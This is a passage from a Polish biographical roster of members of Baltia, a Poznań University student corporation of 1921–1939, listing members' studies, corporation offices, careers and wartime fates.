 68. Władysław Jabłonka, student prawa UP, c. ok. 1925, skreślony 1925, w Zarządzie Akademickiego Koła Pomorskiego 1924-25, adwokat w Świeciu
 69. Adam Jabłoński, filomata pomorski, prezes Towarzystwa Tomasza Zana w Chełmnie 1919, skreślony 1926
 70. Mieczysław Jakubowski, (1896 w Starzechowicach - 1963 Londyn) s. Kazimierza Ignacego i Marianny z d. Maciejczyk, ranny w obronie Lwowa 1918, odznaczony Krzyżem Walecznych, student prawa UW 1916-20, student i absolwent prawa UP, współzałożyciel Baltii, kierownik Wydziału Sądowego 1921/22, właściciel maj. w Starzechowicach, działacz polityczny, sekretarz generalny Narodowego Związku Młodzieży Akademickiej, członek Wielkiej Rady OWP, poseł na Sejm 1928-35 z ramienia Stronnictwa Narodowego, członek Komitetu Głównego SN 1935-39, w czasie okupacji skarbnik, a później wiceprezes Zarządu Głównego SN „Kwadrat”, członek Rady Jedności Narodowej 1944, od 1952 na emigracji, wiceprzewodniczący Komitetu Politycznego SN na Uchodźstwie
 71. Wacław Janicki, (30 sierpnia 1912 w Grabowie nad Prosną - 25 (?) czerwca 1984) student i absolwent 1935 farmacji UP, w 1956 farmaceuta w Gdyni, pochowany na Cmentarzu Gdynia-Witomino
 72. Antoni Jankowski, (1896-1986) aplikant sądowy w Toruniu
 73. Stefan Kazimierz Jankowski, (1900 w Sztumie - 9 maja 1974) filomata pomorski w Starogardzie Gdańskim, student i absolwent 1929/30 prawa UP, po studiach sędzia na Pomorzu, a następnie adwokat w Gdyni, członek rady SN, uczestnik obrony Wybrzeża 1939, do 1950 radca prawny okupacji brytyjskiej w Niemczech, od 1950 w Stanach Zjednoczonych, wiceprezes Kongresu Polonii stanu Nowy York, dyrektor Instytutu Dmowskiego w Nowym Yorku
 74. Stefan Janowski, student i absolwent prawa UP, założyciel Baltii, sędzia grodzki w Chojnicach, jeden ze współzałożycieli Koła Filistrów w Toruniu
 75. Wiesław Ignacy Jaroszewski, (27 sierpnia 1907 w Lubawie - ok. 17 września 1943 w Warszawie) s. Franciszka i Marii z Chrzanowskich, absolwent Gimnazjum w Brodnicy 1924, członek Towarzystwa Tomasza Zana, student Wydziału Prawno-Ekonomicznego UP, a następnie student i absolwent 1928/29 wychowania fizycznego UP, c. 1927, prezes sem. zim. 1929/30, członek Młodzieży Wszechpolskiej, AZS, Polskiego Związku Lekkoatletycznego, po studiach instruktor wychowania fizycznego w Chrześcijańskim Stowarzyszeniu Młodzieży Męskiej w Poznaniu, a następnie nauczyciel w gimnazjach w Ostrzeszowie, Wolsztynie i Tczewie, w czasie wojny należał do konspiracyjnej organizacji “Ojczyzna”, kurier AK na Pomorze, aresztowany w Warszawie 1943, rozstrzelany przez Gestapo przy Al. Szucha
 76. Alfons Jasieniecki, filomata pomorski 1919-20, kierownik wydziału Banku Polskiego w Poznaniu 1928, sekretarz Koła Filistrów 1927-31
 77. Józef Jeske, (25 marca 1912 w Poznaniu - 14 lipca 2002 w Warszawie) brat Witolda (Chrobria), student i absolwent 1935 farmacji UP, c. 1932, wiceprezes Koła Farmaceutów 1933, dr farmacji 1937, absolwent med. 1947 UW, dr med. UW, prof. i kierownik Katedry Farmakologii i Farmakodynamiki Akademii Medycznej w Warszawie, autor licznych publikacji naukowych, pochowany na Cmentarzu Powązkowskim w Warszawie
 78. Łucjan Jezierski, student i absolwent 1932/33 prawa UP, c. 1927, olderman sem. let. 1930/31, prezes sem. zim. 1932/33
 79. Alojzy Kamiński, filomata pomorski w Chełmnie 1917-19, c. 1935
 80. Jan Kamiński, c. ok. 1930, skreślony 1933
 81. Jerzy Kamieński,
 82. Aleksander Kamrowski, ( - styczeń 1931 w Wyszysku) sędzia grodzki w Wyrzysku, pochowany w Pelplinie
 83. Józef Karasiewicz, s. Kazimierza (Baltia), założyciel i pierwszy II wiceprezes Baltii sem. zim. 1921/22, prawnik, działacz MW, sędzia śledczy w Gdyni, sędzia grodzki w Stargardzie Gdańskim, po wojnie adwokat we Wrocławiu
 84. Kazimierz Karasiewicz, (23 lutego 1862 w Słomowie Wlkp. - 5 października 1926 w Pobiedziskach k. Poznania) ojciec Józefa (Baltia), studiował med. we Wrocławiu i Lipsku, dr med. Uniwersytet w Królewcu, działacz narodowy i spółdzielczy, założyciel m.in. Spółdzielni Rolniczo-Handlowej “Rolnik” 1909 i Towarzystwa Gimnastycznego “Sokół” i Towarzystwa Czytelni Ludowych, organizator Banku Ludowego, pozostawił spory dorobek publicystyczny i popularno-naukowy o tematyce regionalnej, m.in. pierwszy “Przewodnik po Borach Tucholskich”, pochowany w Tucholi, patron Gimnazjum nr 1 w Tucholi
 85. Feliks Karczewski, działacz Młodzieży Wszechpolskiej i Akademickiego Komitetu Obrony Kresów Zachodnich, działacz OWP w Chełmnie

  Zygmunt Karolczak, 1933 r.

 86. Zygmunt Karolczak, c. 1929 [prawd. (7 kwietnia 1907 w Dopiewie - 8 kwietnia 1988 w Gdyni) s. Jana (mistrza piekarskiego) i Aleksandry z Wąsowiczów, brat Stanisława Henryka (Lechia), absolwent Gimnazjum Humanistycznego w Bydgoszczy 1920-28, student i absolwent med. UP 1928-35 (dyplom 1936), założyciel Filomatii Posnaniensis, prezes 1932/33, po wojnie lekarz w Gdyni, ordynator oddziału wewnętrznego i zakaźnego w Chełmie Lubelskim 1938-39, od lata 1939 prowadził własną praktykę w Nakle, w czasie okupacji lekarz w Grudziądzu i Kościerzynie, a w końcu wysłany do Niemiec, po wojnie prowadził przychodnię lekarską przy polskim obozie w Osnabrück, od 1946 lekarz w Czersku, od 1983 na emeryturze, m.in. Przychodni Rejonowej PKP w Czersku oraz w Ośrodku Zdrowia, pochowany na Cmentarzu Witomińskim w Gdyni [Źródła (poza wskazanymi poniżej spisu członków): “Pół wieku lekarskiej służby”; relacja Gabriele Karolczak]

 87. Stefan Karwowski,
 88. Alojzy Kasprowicz, (23 grudnia 1901 w Rożentalu - 21 listopada 1941 w Auschwitz) filomata pomorski, ochotnik WP 1919-20 , inż., działacz polityczny, kierownik Wydziału Młodych OWP w Bydgoszczy 1930, uczestnik wojny obronnej 1939, oficer AK, organizator ruchu oporu w Warszawskim, aresztowany przez Niemców i wywieziony do Auschwitz, tam rozstrzelany
 89. Edward Kempa,
 90. Bogdan Kentzer, (1912-2001) c. 1933

  Władysław Kiedrowski, lata 20-te.

 91. Władysław Kiedrowski, (24 października 1900 w Brzeźnie w woj. pomorskim - 11 listopada 1939 w Lesie Piaśnickim) s. Jana i Balbiny z d. Chamier-Gliszczyńskiej, uczeń Collegium Marianum w Pelplinie 1911-18, absolwent Gimnazjum w Chełmie 1921, wiceprezes Towarzystwa Tomasza Zana, student i absolwent prawa UP 1921-24, sekretarz sem. zim. 1923/24, po studiach sędzia w Tczewie i Wejherowie, a następnie sędzia i przewodniczący Wydziału Handlowego Sądu Okręgowego w Gdyni, wykładowca w Państwowej Szkole Morskiej w Gdyni, działacz społeczny i kaszubski, członek władz OWP w Poznaniu, założyciel i sekretarz Zrzeszenia Miłośników Kaszubszczyzny “Stanica”, aresztowany przez Niemców, rozstrzelany w zbiorowej egzekucji, jego symboliczny grób znajduje się na Cmentarzu Żołnierzy Polskich w Redłowie

 92. Edward Klemp, (1911-1996)
 93. Leon Klunder, c. ok. 1925, skreślony 1926, członek Zarządu Akademickiego Koła Pomorskiego 1924/25

  Feliks Konkolewski, 1926/27 r.

 94. Feliks Konkolewski, (1905-2000) brat Leona (Baltia), filomata pomorski w Toruniu, sekretarz sem. zim. 1926/27, wiceprezes sem. zim. 1927/28, starszy asystent Zakładu Anatomii-Patologicznej UP, po wojnie zamieszkał w Toruniu

  Leon Konkolewski, ok. 1926 r.

 95. Leon Konkolewski, (6 kwietnia 1903 w Toruniu - 2 września 1958 w Toruniu) brat Feliksa (Baltia), absolwent Gimnazjum im. M. Kopernika w Toruniu, członek Towarzystwa Tomasza Zana, filomata pomorski, student i absolwent (dr med.) 1927 med. UP, po studiach adiunkt w Zakładzie Anatomii Patologicznej UP kierowanym przez prof. Ludwika Skubiszewskiego w Poznaniu, starszy asystent Kliniki Terapeutycznej Chorób Wewnętrznych UP 1932-35, I wiceprezes Koła Filistrów 1931-32, ordynator Oddziału Wewnętrznego Publicznego Szpitala Miejskiego w Toruniu 1935-39 i od 1945, w czasie wojny więzień obozu koncentracyjnego w Sachsenhausen i obozu przesiedleńczego dla Polaków w Potulicach, autor publikacji fachowych w “Polskim Przeglądzie Chirurgicznym”

 96. Stanisław Konwiński,
 97. Henryk Koralewski,
 98. Jan Zygfryd Kortas, (12 września 1912 w Kijewie Królewskim k. Chełmna - 25 sierpnia 1992) student i absolwent 1937 med. UP, c. 1930, sekretarz sem. zim. (od lutego) i sem. let. 1932/33, prezes r.a. 1933/34, olderman sem. let. 1934/35 oraz sem. zim. 1938/39, dr med. Pomorskiej AM w Szczecinie 1950, prof. zw., dyrektor Instytutu Chirurgii Pomorskiej i rektor AM w Szczecinie
 99. Józef Kortas, prezes sem. zim. i sem. let. 1937/38, olderman sem. let. 1938/39, przewodniczący delegacji PKM na IX Zjazd Rady Naczelnej ZPKA
 100. Stefan Kott, c. 1926
 101. Henryk Kowalewski, c. ok. 1935, skreślony 1935/36
 102. Bernard Kozielski, ( - październik ? 1934)
 103. Julian Kozłowski, student i absolwent 1932/33 prawa UP, wiceprezes sem. let. 1927/28, skreślony 1936, prezes AKP 1926/27, aplikant adwokacki w Toruniu 1939, oficer rez., przedostał się przez Węgry do Wielkiej Brytanii, pracował u Leona Ossowskiego, później wyemigrował do Stanów Zjednoczonych, gdzie wkrótce zmarł
 104. Bronisław Krajnik, student i absolwent 1933/34 med. UP, c. 1929, dr med., sekretarz Koła Filistrów 1936-39
 105. Franciszek Krakowski, c. 1926, działacz Akademickiego Koła Pomorskiego
 106. Jan Kranc,
 107. Józef Kranc,
 108. Willy Kreft, c. 1928, działacz Akademickiego Koła Pomorskiego
 109. Edmund Krótki, (1900-1980) nadleśniczy w Baszkowie pow. Krotoszyn, więzień niemieckiego oflagu w Woldenbergu
 110. Mieczysław Kruszewski, student farmacji UP, prezes Koła Farmaceutów UP 1938/39, farmaceuta
 111. Roman Krysiński, c. 1929 [być może: Roman Krysiński (1905-1973) brat Zygmunta (Sigismundia) prezes Sigismundii sem. let. 1933/34, prawnik, adwokat]
 112. Włodzimierz Krzyżaniak, c. 1935, wiceprezes sem. let. 1936/37, referent prasowy ZPKA 1938 (XVI kadencja), wiceprezes Młodzieży Wszechpolskiej 1937/38, mgr
 113. Leon Kubica, c. 1934, sekretarz r.a. 1935/36, wiceprezes sem. zim. 1937/38, skreślony 1938
 114. Alfred Kucner, student i absolwent Wydziału Humanistycznego 1935 UP, c. 1928, skreślony 1936, publicysta, referent kultury przy Zarządzie Poznańskiej MW, członek Zarządu Okręgowego SN w Poznaniu 1939, po wojnie dr historii, pracownik naukowy UWr. oraz Archiwum Państwowego we Wrocławiu
 115. Hieronim Kulwicki, c. 1927, skreślony 1933
 116. Franciszek Kurkierewicz (Kurkiewicz), skreślony 1926
 117. Witold Kurowski, (1902-1977) członek Towarzystwa Tomasza Zana, założyciel Baltii, członek Młodzieży Wszechpolskiej i Narodowego Związku Młodzieży Akademickiej, działacz Związku Obrony Kresów Zachodnich, sędzia powiatowy w Grudziądzu, adwokat, II wiceprezes Koła Filistrów 1931-32, odznaczony m.in. Złotym Krzyżem Zasługi 1938, w czasie II wojny światowej jeniec niemieckich oflagów
 118. Zygmunt Kurowski, filomata pomorski w Stargardzie Gdańskim, c. 1928, prezes sem. zim. 1931/32, olderman r.a. 1933/34, członek władz okręgowych OWP w Wielkopolsce
 119. Kazimierz Kurpisz, (przed 1899 - przed 1985) s. Bolesława i Marii z d. Stam, brat Edmunda (Lechia), szwagier Teobalda Olejnika (Gedania), student i absolwent 1926/27 filologii germańskiej UP, dr filozofii, prof. gimnazjum w Poznaniu, dyrektor szkoły specjalnej w Szubinie, pochowany w Szubinie [Źródła (poza wskazanymi poniżej spisu członków): relacja Bolesława Kurpisza]
 120. Gabriel Kwiatkowski, c. 1935, więzień niemieckiego oflagu w Woldenbergu
 121. Ludwik Kwiatkowski, c. 1936
 122. Stefan Kwiatkowski, sekretarz sem. zim. 1932/33, skreślony 1933

  Aleksander Lammek.

 123. Aleksander Lammek, student i absolwent 1933 med. UP, działacz Akademickiego Koła Pomorskiego

  Jan Latzke, 1936 r.

 124. Jan Latzke, (29 lipca 1912 - 17 października 1951) student prawa UP, c. 1934, prezes sem. zim. 1936/37, olderman sem. zim. i sem. let. 1937/38, wiceprezes ZPKA 1937-38 (XV kadencja), działacz Młodzieży Wszechpolskiej i OWP, redaktor odpowiedzialny pisma “Orlęta” 1934/35, ppor. rez., w czasie wojny w niemieckich oflagach, m.in. w Dössel

 125. Leon Lemański, c. 1933
 126. Aleksander Lempe, c. 1926, skreślony 1927
 127. Maciej Lewandowski,
 128. Waldemar Liedkiewicz, c. 1934, wiceprezes r.a. 1935/36 (od listopada) oraz sem. let. 1938/39 (ostatnie Prezydium przed wojną), członek Sądu Koleżeńskiego Bratniej Pomocy Studentów UP 1936/37
 129. Ignacy Lipiński, c. 1926, skreślony 1928, działacz Akademickiego Koła Pomorskiego
 130. Józef Lipski, filomata pomorski, członek Towarzystwa Tomasza Zana
 131. Kazimierz Lipski, c. 1928, działacz Akademickiego Koła Pomorskiego
 132. Edmund Lutoborski (Lutobarski), c. 1927, działacz Akademickiego Koła Pomorskiego
 133. Tadeusz Łazarewicz, c. 1925, działacz Akademickiego Koła Pomorskiego
 134. Wincenty Łącki, (1898-1964) absolwent Gimnazjum w Starogardzie, student i absolwent prawa UP, założyciel Baltii, w okresie studiów związany z obozem narodowym, prezes Narodowego Związku Młodzieży Akademickiej w Poznaniu 1921, prezes poznańskiej Młodzieży Wszechpolskiej 1922 i wiceprezes Rady Naczelnej MW, sędzia Sądu Okręgowego w Grudziądzu, starosta krajowy pomorski w Toruniu 1927-39, prezes Instytutu Bałtyckiego 1931-39, prezes pomorskiego ZHP 1931-39, po wybuchu wojny na emigracji, członek Rady Narodowej w Londynie 1942-45, po wojnie pozostał na emigracji w Wielkiej Brytanii, prezes zarządu Fundacji Dobroczynności Polskiej Misji Katolickiej w Anglii i Walii 1952-64

  Zbigniew Łebiński, ok. 1923 r.

 135. Zbigniew Łebiński, (20 sierpnia 1905 - 19 lutego 1925) c. ok. 1924, s. Walerego i Haliny z Daszkiewiczów, zginął na skutek rany odniesionej w pojedynku na pistolety z Bobińskim

 136. Edmund Łoziński, c. 1927, sekretarz sem. let. 1930/31, członek Zarządu Akademickiego Koła Pomorskiego 1930/31
 137. Kazimierz Maciejewski, c. 1925
 138. Alojzy Macholz, ( - ok. 1970) student i absolwent 1929/30 prawa UP, c. 1925, działacz Akademickiego Koła Pomorskiego, adwokat
 139. Leszek Maćkiewicz, c. 1925, skreślony 1927
 140. Józef Malanowski, (1913-2001), c. ok. 1930, więzień niemieckiego oflagu w Woldenbergu
 141. Roman Manikowski, c. 1926, działacz Akademickiego Koła Pomorskiego, działacz Obozu Wielkiej Polski w Toruniu
 142. Edmund Markowski, c. ok. 1930
 143. Edmund Masiak, student i absolwent 1927/28 prawa UP, filomata pomorski, prezes Towarzystwa Tomasza Zana w Chełmnie 1920-21, aplikant sądowy w Toruniu 1928, aresztowany 9 listopada 1939 i osadzony w więzieniu na Zamku Lubelskim, zwolniony 14 lutego 1940, adwokat, w Izbie Adwokackiej w Radomiu, a od 1945 w Lublinie, następnie w Toruniu i Gdańsku-Wrzeszczu
 144. Nikodem Matuszewski, działacz Młodzieży Wszechpolskiej
 145. Wincenty Mazurkiewicz, filomata pomorski w Świeciu, student i absolwent prawa UP, skarbnik Młodzieży Wszechpolskiej 1923/24, po wojnie w Szczecinie
 146. Stefan Mądrowski, c. 1927, działacz Akademickiego Koła Pomorskiego
 147. Alfons Miedzianowski, (7 stycznia 1912 w Grudziądzu - 26 maja 1992) student i absolwent 1933 med. UP, w wojnie obronnej 1939 w 4 Pułku Lotniczym z Torunia, przez Węgry przedostał się do Bejrutu, gdzie wystąpił do Brygady Karpackiej, m.in. uczestnik bitwy pod Tobrukiem, ranny w walkach, po wojnie wrócił do kraju, lekarz internista i ftyzjatra w Olsztynie
 148. Edward Mierzwa, (1910 - 14 października 1991) c. 1932/33, skreślony 1933, więzień niemieckiego oflagu w Woldenbergu
 149. Stanisław Mizerski, c. 1925
 150. Henryk Młodecki, (28 listopada 1918 w Osie - 29 stycznia 1998 w Łodzi) student i absolwent 1945 farmacji UP, sekretarz sem. let. 1937/38, wiceprezes PKM 1939, ostatni wiceprezes ZPKA 1938-39 (XVII kadencja), dr med. UP 1950, później prof. bromatologii w Łodzi
 151. Henryk Narzyński, (1908-1940) student i absolwent 1937 farmacji UP, olderman sem. zim. 1934/35, prezes sem. let. 1934/35, olderman r.a. 1935/36, prezes Koła Farmaceutów UP 1933-34, członek prezydium Delegacji Kół Naukowych UP 1933, działał w Związku Zawodowym Farmaceutów, w czasie okupacji członek zarządu konspiracyjnego Stronnictwa Narodowego w Poznaniu, aresztowany przez Niemców, rozstrzelany (według innej wersji zginął próbując ratować się ucieczką)
 152. Neumann, c. 1929
 153. Albin Nitka, wiceprezes 1922/23, od 1928 urzędnik skarbowy w Gniewie, burmistrz Starogardu Gdańskiego
 154. Władysław Nitka, c. 1933

  Tadeusz Nowak, 1934 r.

 155. Tadeusz Nowak, sekretarz sem. zim. 1934/35

  Bronisław Nowicki, 1928/29 r.

 156. Bronisław Nowicki, (20 lutego 1907 w Baden Baden - 15 kwietnia 1981 w Bydgoszczy) absolwent Gimnazjum Humanistycznego w Bydgoszczy, student i absolwent Wydziału Prawno-Ekonomicznego UP, c. 1927, sekretarz sem. let. 1928/29, wiceprezes sem. zim. 1929/30, współautor publikacji “Od morza jesteśmy od morza - Historia Baltii Korporacji Studentów Uniwersytetu Poznańskiego 1921-1939″ (Poznań b.r.w.), grafik, artysta plastyk, malarz, jako dowódca kampanii walczył w 30 pułku piechoty w Warszawie, w obozach jenieckich w Nienburgu, Spittalu, Woldenbergu IIc, po wojnie pracował artystycznie w Bydgoszczy

 157. Wiktor Nowatke, c. 1929
 158. Zygmunt Odya (Odyja), filomata pomorski w Starogardzie Gdańskim, c. 1926, olderman sem. let. 1929/30, działacz Akademickiego Koła Pomorskiego
 159. Zygmunt Ohl, filomata pomorski w Świeciu, student i absolwent 1925/26 leśnictwa UP, adiunkt leśny w nadleśnictwie Leszczyce, zginął omyłkowo rozstrzelany przez Niemców
 160. Wiesław Olszewski, c. 1932/33, wiceprezes sem. let. 1937/38
 161. Bruno Ornas, c. 1929, działacz Akademickiego Koła Pomorskiego
 162. Kazimierz Ossowski, c. ok. 1925, skreślony 1925
 163. Konstanty Ossowski, c. 1936

  Leon Ossowski, 1927/28 r. (?).

 164. Leon Ossowski, student i absolwent 1928/29 leśnictwa UP, olderman sem. let. 1926/27, prezes sem. zim. 1927/28, mieszkał w Chylonji pow. morski, po wojnie na emigracji w Wielkiej Brytanii

 165. Jan Ostrowski, (16 maja 1909 w Czersku - 5 czerwca 1973) student med. UP, c. 1929, działacz Akademickiego Koła Pomorskiego, absolwent med. Uniwersytet w Grazu 1939, po wojnie laryngolog, ordynator Oddziału Laryngologicznego Szpitala Miejskiego w w Lesznie, członek Polskiego Towarzystwa Otolaryngologicznego
 166. Marian Oszwałdowski, (1901-1973) filomata pomorski w Toruniu, student i absolwent (dr med.) 1929/30 med. UP, sekretarz sem. zim. 1925/26, wiceprezes sem. let. 1926/27
 167. Roman Otlewski, c. 1927
 168. Jan Ożga, c. 1931
 169. Mieczysław Ożga, ?
 170. Janusz Pacanowski, c. 1936, sekretarz sem. zim. 1938/39
 171. Zbyszko St. Pacanowski, student i absolwent 1932/33 prawa UP, c. 1927, wiceprezes sem. zim. 1932/33
 172. Marian Palicki, (12 sierpnia 1901 w Więzownie pow. Bydgoszcz - 28 lutego 1990 w Bydgoszczy) filomata pomorski w Świeciu, organizator, przewodniczący koła Towarzystwa Tomasza Zana w Świeciu 1917-20, absolwent Gimnazjum w Świeciu 1920, student prawa UP, założyciel Baltii, olderman sem. let. 1924/25, prawnik, kierownik Ruchu Młodych OWP w Bydgoszczy, w 1939 dyrektor Związku Fabrykantów w Bydgoszczy, w czasie wojny w AK, po 1945 naczelny dyrektor Zjednoczenia Pomorskiego Przemysłu Konfekcyjnego, współautor publikacji “Od morza jesteśmy od morza - Historia Baltii Korporacji Studentów Uniwersytetu Poznańskiego 1921-1939″ (Poznań b.r.w.), autor “Wspomnień z działalności TTZ w Świeciu”
 173. Adam Paluszyński, (1912 - 27 marca 1991)
 174. Marian Adam Paluszyński, c. 1927, prezes sem. let. 1932/33, sekretarz PKM 1931/32, członek Komisji Rewizyjnej Kół Naukowych UP i Sądu Koleżeńskiego 1932, prezes 1932/33 oraz przewodniczący Komisji Rewizyjnej Koła Prawników i Ekonomistów
 175. Alfons Pastwa, sekretarz sem. let. 1938/39 (ostatnie Prezydium przed wojną)
 176. Jan Pastwa, (1901-1973) działacz Polonii gdańskiej
 177. Antoni Paulus, ( - 1982) brat Jana (Baltia), filomata pomorski, student i absolwent 1926/27 prawa UP, sekretarz sem. let. 1924/25, olderman sem. zim. 1926/27, sekretarz PKM sem. zim. 1925/26, oficer rez., w wojnie obronnej 1939 w 63 Pułku Piechoty w Armii Pomorze, m.in. uczestnik bitwy nad Bzurą, więzień niemieckich oflagów, m.in. w Woldenbergu i pod Hamburgiem, w 1946 wrócił do kraju, adwokat w Toruniu
 178. Jan Paulus, ( - 1939) brat Antoniego (Baltia), filomata pomorski w Toruniu, skreślony 1928, sierżant pchor. rez., w wojnie obronnej 1939 w oddziałach sanitarnych, ciężko ranny, zmarł podczas transportu z pod Lwowa do Warszawy w skutek odniesionych ran
 179. Stanisław Pazdewski, c. 1936
 180. Witold Piasecki, student i absolwent 1934/35 ekonomii UP, c. ok. 1930, wiceprezes sem. let. 1932/33

  Zdzisław Poklękowski, 1935 r.

 181. Zdzisław Poklękowski, wiceprezes sem. zim. oraz sem. let. 1934/35, prezes r.a. 1935/36, wiceprezes Bratniej Pomocy Studentów UP 1933, członek władz OWP w Poznaniu

 182. Alfons Pronobis, c. 1936
 183. Stanisław Pruski, założyciel Baltii, prawnik, sędzia powiatowy w Świeciu
 184. Stanisław Przybyszewski, skreślony 1933, aplikant sądowy w Toruniu 1928, sędzia sądu grodzkiego w Brodnicy 1930

  Franciszek Przytarski, 1936 r.

 185. Franciszek Przytarski, (16 lutego 1913 w Małej Cerkwicy w pow. sępoleńskim - 1940 w Katyniu) s. Leonarda, student i absolwent prawa UP, c. 1934, wiceprezes r.a. 1935/36, sekretarz sem. zim. 1936/37, prezes sem. let. 1938/39 (ostatnie Prezydium przed wojną), prezes ZPKA 1938 (XVI kadencja), odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA, redaktor, ppor. rez., w wojnie obronnej w 18 Pułku Ułanów w Wielkopolskiej Brygadzie Kawalerii, w niewoli sowieckiej, zamordowany przez NKWD

 186. Alfred Radomski, ( - 1989) brat Witolda (Baltia), brat stryjeczny Sylwestra (Lutyko-Venedya), c. 1929

  Witold Radomski (?), 1927/28 r. (?).

 187. Witold Radomski, ( - 1993) brat Alfreda (Baltia), brat stryjeczny Sylwestra (Lutyko-Venedya), olderman sem. zim. 1927/28, sem. let. 1931/32, sem. zim. i sem. let. 1932/33, współautor “Od morza jesteśmy od morza - Historia Baltii Korporacji Studentów Uniwersytetu Poznańskiego 1921-1939″ (Poznań b.r.w.)

 188. Aleksander Radzymiński, (18 czerwca 1910 w Rypinie - 27 lipca 1972) absolwent Gimnazjum w Brodnicy 1927, student i absolwent 1933 med. UP, c. 1927, wiceprezes sem. let. 1930/31, dr med. 1934, starszy asystent w Klinice Otolaryngologii UP 1932-39, stażysta w klinice otolaryngologicznej w Bordeaux 1936/37, uczestnik wojny obronnej 1939, habilitacja AM w Poznaniu 1950, od 1952 kierownik Katedry i Kliniki Laryngologicznej AM w Łodzi, prorektor 1955-59, prof. zw. 1963, członek Komitetu Redakcyjnego “Otolaryngologii Polskej”, laureat nagrody Miasta Łodzi, należał do wielu zagranicznych towarzystw naukowych, w tym do Collegium Amitiae Sacrum, oraz Royal Society of Medicine w Londynie, ogłosił 54 prace w piśmiennictwie polskim i 23 w zagranicznym, odznaczony m.in. Krzyżem Oficerskim OOP, Złotym Krzyżem Zasługi, Krzyżem Partyzanckim
 189. Franciszek Raszeja, (2 kwietnia 1886 w Chełmnie nad Wisłą - 21 lipca 1942 w Warszawie) - brat Leona (Batlia) lekarz, ortopeda, nauczyciel uniwersytecki, habilitacja UP 1931, od 1932 kierownik Kliniki Ortopedycznej w Poznaniu, sekretarz 1924-27 oraz I wiceprezes 1927-31 Koła Filistrów Baltii
 190. Leon Raszeja, (26 czerwca 1901 w Chełmnie - 9 września 1939) brat Franciszka (Baltia), absolwent Gimnazjum w Chełmnie, członek Towarzystwa Tomasza Zana, uczestnik wojny polsko-radzieckiej 1920, student prawa UJ i UP, olderman sem. let. 1923/24, prezes sem. let. 1924/25, prawnik, działacz społeczno-polityczny, prezydent Torunia 1936-39, wiceprzewodniczący OZON okręgu Pomorskiego, po wybuchu II wojny światowej komendant obrony przeciwlotniczej Torunia, po ewakuacji zaciągnął się w szeregi WP, zginął podczas niemieckiego nalotu w Lublinie
 191. Stefan Redziński, (1905-1979) student i absolwent prawa UP, sekretarz sem. zim. 1927/28, prezes Akademickiego Koła Pomorskiego 1927/28, po studiach prokurator Prokuratury Powiatowej w Brodnicy, uczestnik wojny obronnej 1939, w niewoli niemieckiej w oflagu w Woldenbergu, po wojnie prokurator Prokuratury Wojewódzkiej 1945-71
 192. Stanisław Regiel (Regel), student i absolwent 1927/28 prawa UP, aplikant sądowy w Chojnicach 1928
 193. Hartwig Reinke, c. 1933
 194. Bronisław Rekowski, sekretarz PKM 1936/37
 195. Zygmunt Rekowski, c. 1936
 196. Henryk Remke,
 197. Ignacy Michał Reiwer (Reywer), (4 stycznia 1897 w Trzebczy - ) student i absolwent (dr med.) 1926 med. UP, kpt. (służby zawodowej ?), w 1939 lekarz w Suwałkach, w 1956 internista w Pleszewie
 198. Władysław Rogoziński, filomata pomorski, prezes Towarzystwa Tomasza Zana w Chełmnie 1918, student prawa UP, założyciel i pierwszy sekretarz Baltii sem. zim. 1921/22, prezes Akademickiego Koła Pomorskiego 1923, prawnik, sędzia powiatowy w Gniewie, sędzia grodzki w Grudziądzu
 199. Maksymilian Rolbiecki, student i absolwent 1927/28 rolnictwa UP, działacz Akademickiego Koła Pomorskiego, radca Ministerstwa Reform Rolnych w Warszawie
 200. Franciszek Ksawery Rost, (5 listopada 1890 w Wielichowie w pow. kościańskim - 1940 w Katyniu), s. Hieronima i Józefy z Góreckich, student i absolwent med. Uniewrsytet w Lipsku, prezes Akademickiego Koła Pomorskiego, członek BBWR, uczestnik I wojny światowej i powstania wielkopolskiego, żołnierz w wojnie 1920-21 w 10 Pułku Strzelców, mjr rez, przydzielony do 7 Szpitala Okręgowego, odznaczony Krzyżem Walecznych i Medalem Niepodległości, w niewoli sowieckiej, zamordowany przez NKWD
 201. Franciszek Roszak, student i absolwent prawa, założyciel Baltii, wiceprezes sem. let. 1921/22, sędzia okręgowy w Grudziądzu
 202. Hipolit Roszczynialski, (1897 - 1939) s. Mariana i Eufrozyny z d. Malotke, brat Józefa (Baltia) oraz Edmunda i Wiktora (Magna-Polonia), w wojnie polsko-rosyjskiej 1920 rotmistrz 18 Pułku Ułanów, odznaczony Virtuti Militari, Krzyżem Walecznych i Medalem Niepodległości, od 1934 wójt Rumii, zamordowany przez Niemców w Piaśnicy k. Wejherowa
 203. Józef Roszczynialski, s. Mariana i Eufrozyny z d. Malotke, brat Hipolita (Baltia) oraz Edmunda i Wiktora (Magna-Polonia), filomata pomorski w Świeciu, student i absolwent 1926/27 prawa UP, sędzia grodzki w Chojnicach
 204. Alfred Rutkowski, ( - przed 1981) c. 1936, więzień niemieckiego oflagu w Woldenbergu
 205. Alojzy Rutkowski, skreślony 1927, działacz Akademickiego Koła Pomorskiego
 206. Stefan Rutkowski, sekretarz Akademickiego Koła Pomorskiego 1926/27, więzień obozu jenieckiego w Neubrandenburgu
 207. Czesław Ryll, c. 1928
 208. Witold Rysiewski (Rysiewicz),
 209. Teofil Robert Rytlewski, (7 czerwca 1907 w Świeciu - 1940 w Katyniu) s. Franciszka, student i absolwent ekonomii UP, c. 1927, działacz polityczny, sekretarz powiatowy OWP w Toruniu, następnie zamieszkały w Gdańsku, ppor. rez., w wojnie obronnej 1939 w 2 Baonie Strzelców, w niewoli sowieckiej, zamordowany przez NKWD
 210. Stefan Rzepa, dr med. Uniwersytetu w Grazu 1934/35, c. 1927, działacz Akademickiego Koła Pomorskiego
 211. Józef Safianowicz, c. ok. 1930, skreślony 1931
 212. Józef Samulczyk, c. 1925, skreślony 1927
 213. Edmund Sawicki, c. 1933/34
 214. Jan Schwanz, skreślony 1926
